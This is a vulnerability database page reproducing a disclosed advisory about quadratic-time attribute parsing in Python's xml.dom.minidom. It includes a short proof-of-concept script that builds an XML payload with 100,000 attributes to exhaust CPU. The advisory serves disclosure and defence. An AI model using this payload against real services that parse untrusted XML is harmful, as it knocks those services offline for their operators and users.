Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Python 3 Minidom Denial of Service

🗓️ 17 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 112 Views

Python 3 minidom parsing many attributes can cause CPU exhaustion and Denial of Service with untrusted XML.

Code
=============================================================================================================================================
    | # Title     : python3 minidom Algorithmic Denial of Service (DoS) via Excessive XML Attributes                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.python.org/                                                                                                     |
    =============================================================================================================================================
    
    
    [+] Summary    : This proof of concept demonstrates an Algorithmic Denial of Service (Algo-DoS) condition caused by parsing an XML document containing an extremely 
                     large number of attributes using Python’s xml.dom.minidom library. Due to inefficient attribute handling with quadratic time complexity, the XML parser may 
    				 consume excessive CPU resources, leading to severe performance degradation or service unavailability. The issue becomes critical when untrusted XML input is 
    				 processed without proper size limits or resource controls. 
                     This behavior does not result in code execution but represents a significant availability risk for applications relying on vulnerable XML parsing mechanisms
      
    [+] POC :   
    
    import xml.dom.minidom
    import time
    
    def trigger_dos_vulnerability():
        count = 100000 
        payload = '<?xml version="1.0"?><root ' + ' '.join([f'attr{i}="v"' for i in range(count)]) + ' />'
        print(f"[*] Attempting to process {count} attributes...")
        start_time = time.time()
        try:
            xml.dom.minidom.parseString(payload) 
            end_time = time.time()
            print(f"[+] Processing completed successfully in {end_time - start_time:.2f} seconds.")
            print("[!] The system might not be vulnerable, or the input is insufficient for a crash.")
        except Exception as e:
            print(f"[-] An error occurred during processing: {e}")
    
    if __name__ == "__main__":
        trigger_dos_vulnerability()
    	
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Feb 2026 00:00Current
6.2Medium risk
Vulners AI Score6.2
pythonminidomdenial of serviceattribute parsinguntrusted input
112